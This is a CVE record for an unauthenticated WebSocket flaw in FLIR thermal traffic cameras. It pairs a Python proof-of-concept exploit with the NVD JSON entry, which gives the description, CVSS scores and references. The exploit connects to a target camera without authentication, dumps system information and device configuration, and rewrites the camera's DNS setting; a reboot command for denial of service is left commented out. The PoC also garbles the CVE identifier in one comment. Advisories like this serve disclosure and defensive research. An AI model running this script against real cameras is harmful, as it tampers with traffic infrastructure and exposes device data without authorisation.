CVE-2018-25140

import websocket import json import time # CVE-2018-2018-25140 PoC - FLIR Thermal Traffic Camera WebSocket Authentication Bypass # Target: FLIR thermal traffic cameras with vulnerable WebSocket implementation def exploit_flir_camera(target_ip, target_port=7682): """ Exploit for CVE-2018-25140 - Unauthenticated WebSocket access to FLIR cameras Parameters: - target_ip: IP address of the vulnerable FLIR camera - target_port: WebSocket port (default: 7682) """ ws_url = f"ws://{target_ip}:{target_port}" print(f"[*] Connecting to {ws_url}...") try: # Establish WebSocket connection without authentication ws = websocket.create_connection(ws_url, timeout=10) print("[+] Connected successfully - No authentication required!") # Enumerate system information info_cmd = {"action": "get", "resource": "system_info"} ws.send(json.dumps(info_cmd)) response = ws.recv() print(f"[+] System Info Response: {response}") # Read device configuration config_cmd = {"action": "get", "resource": "device_config"} ws.send(json.dumps(config_cmd)) response = ws.recv() print(f"[+] Device Config Response: {response}") # Modify device configuration (integrity impact) modify_cmd = { "action": "set", "resource": "network_config", "data": {"dns": "8.8.8.8"} } ws.send(json.dumps(modify_cmd)) response = ws.recv() print(f"[+] Config Modification Response: {response}") # Denial of Service test (commented out for safety) # dos_cmd = {"action": "reboot"} # ws.send(json.dumps(dos_cmd)) ws.close() return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 7682 exploit_flir_camera(target, port)

{"cve": {"id": "CVE-2018-25140", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:48.113", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FLIR thermal traffic cameras contain an unauthenticated device manipulation vulnerability in their WebSocket implementation that allows attackers to bypass authentication and authorization controls. Attackers can directly modify device configurations, access system information, and potentially initiate denial of service by sending crafted WebSocket messages without authentication."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/45539", "source": "[email protected]"}, {"url": "https://www.flir.com", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5490.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}